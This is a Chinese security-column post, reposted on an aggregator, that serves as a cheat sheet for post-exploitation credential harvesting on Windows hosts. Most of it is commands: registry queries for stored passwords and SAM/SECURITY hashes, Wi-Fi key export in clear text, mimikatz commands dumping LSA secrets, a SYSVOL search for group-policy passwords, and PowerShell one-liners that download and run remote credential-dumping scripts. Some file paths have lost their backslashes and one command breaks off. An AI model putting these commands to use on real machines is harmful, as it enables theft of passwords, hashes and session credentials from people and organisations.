专栏名称: 天億网络安全
全面介绍网络安全相关知识、安全建设方案、分享网络安全行业法律法规及相关政策等内容,一个学习网络安全知识、技术、业务交流的全国性平台。
目录
相关文章推荐
中科院物理所  ·  蛇毒为何如此令人敬畏? ·  昨天  
中科院物理所  ·  哪吒电影里的岩浆海真的存在吗? ·  2 天前  
中科院物理所  ·  物理学中真有“魔法”,它代表一类量子资源 ·  3 天前  
中科院物理所  ·  橡皮能不能黏住尺子?小学生都知道DeepSe ... ·  3 天前  
环球物理  ·  【物理科技】增强物理AI系统来了!让物理课本 ... ·  3 天前  
51好读  ›  专栏  ›  天億网络安全

后渗透凭证收集

天億网络安全  · 公众号  ·  · 2019-10-14 17:31

正文

请点击上面 一键关注!

内容来源:MottoIN

一、浏览器 chrome 

C:UsersAdministratorAppDataLocalGoogleChromeUser DataDefault


firefox 

C:UsersAdministratorAppDataLocalMozillaFirefoxProfile


IE 

C:UsersAdministratorAppDataLocalMicrosoftCredentials


也可使用工具进行抓取 BrowserPasswordDump.exe(图中有下载地址)

支持导出如下密码 

Firefox
Google Chrome
Microsoft Edge
Internet Explorer
UC Browser
Torch Browser
Chrome Canary/SXS
CoolNovo Browser
Opera Browser
Apple Safari
Flock Browser
SeaMonkey Browser
SRWare Iron Browser
Comodo Dragon Browser


二、windows凭据管理器 

cmdkey /list

RDP连接记录 

reg query "HKCUSoftwareMicrosoftTerminal Server ClientDefault"

抓取密码 

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1');Invoke-WCMDump"


也可以用mimikatz

三、邮箱 EmailPasswordDump.exe

支持导出如下密码 

Microsoft Outlook Express
Microsoft Outlook 2002/XP/2003/2007/2010/2013
Mozilla Thunderbird
Windows Live Mail 2012
IncrediMail
Opera Mail
The




    
 Bat!
Foxmail v6.x - v7.x
Windows Live Messenger
MSN Messenger
Google Talk
GMail Notifier
PaltalkScene IM
Pidgin (Formerly Gaim) Messenger
Miranda Messenger
Windows Credential Manager

OutlookPasswordDump.exe


四、软件注册表 

REG query "HKEY_CURRENT_USERSoftware" /v "password" /s

五、无线密码 列出连接过的wifi 

netsh wlan show profiles

导出密码 

netsh wlan export profile interface=无线网络连接 key=clear folder=C:windowstemp


六、VPN 

C:UsersAdministratorAppDataRoamingMicrosoftNetworkConnectionsPbk

mimikatz抓VPN密码 

mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets exit

七、windows其他部分信息 无人值守安装 

C:unattend.xml
C:WindowsPantherUnattend.xml
C:WindowsPantherUnattendUnattend.xml
C:Windowssystem32sysprep.inf
C:Windowssystem32sysprepsysprep.xml

windows密码错误提示信息 

reg query HKLMSAMSAMDomainsAccountUsersUserPasswordHint

windows缓存hash 

reg query HKEY_LOCAL_MACHINESECURITYCACHE

gpp 

dir \SYSVOL /s /b /A | find ".xml"

windows自动登录 

reg query "HKLMSOFTWAREMicrosoftWindows NTCurrentversionWinlogon"

八、laZagne 抓多种类型密码小工具 

https://github.com/AlessandroZ/LaZagne.git

支持抓取的密码如下 

chats,mails,all,git,svn,database,windows,wifi,sysadmin,browsers,games,memory,php,maven

九、进程相关 从目标进程中搜索敏感字符串 

powershell "iex (New-Object Net.WebClient).DownloadString('https://raw.g

进程如下 

#####Webmail#####

Gmail
Office365
Outlook Web
#####Accounting#####

Xero
MYOB
#####Remote Access#####

Juniper SSL-VPN
Citrix NetScaler
Remote Desktop Web Access 2012
#####Developement#####

Jira
Github
Bugzilla
Zendesk
Cpanel
#####IHateReverseEngineers#####

Malwr
VirusTotal
AnubisLabs
#####Misc#####

Dropbox
Microsoft Onedrive
AWS Web Services
Slack
Twitter
Facebook


其他信息 FileZilla、PuTTY、WinSCP、rdp 

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/fireeye/SessionGopher/master/SessionGopher.ps1');Invoke-SessionGopher"


Teamviewer 

https://github.com






请到「今天看啥」查看全文


推荐文章
中科院物理所  ·  蛇毒为何如此令人敬畏?
昨天
中科院物理所  ·  哪吒电影里的岩浆海真的存在吗?
2 天前
中科院物理所  ·  物理学中真有“魔法”,它代表一类量子资源
3 天前
中科院物理所  ·  橡皮能不能黏住尺子?小学生都知道DeepSeek会回答错吗?| 正经玩
3 天前
环球物理  ·  【物理科技】增强物理AI系统来了!让物理课本上的图表“动”起来
3 天前
虎嗅APP  ·  早报 | Smartisan OS 将基于 YunOS?锤粉能接受吗?
7 年前
投资银行在线  ·  连亏20年,如今冲击世界首富,贝佐斯的独特思维是什么?
7 年前
半月谈  ·  【互动】小编我热得不想打字......用56首歌来表达心情,你想听吗?
7 年前
生态修复网  ·  五部委部署土壤污染状况详查 2020年底前摸清重点地块污染状况
7 年前
老道消息  ·  将改革进行到底
7 年前
Sov5搜索   ·   小百科   ·   今天看啥   ·   移动版
51好读 - 好文章就要读起来!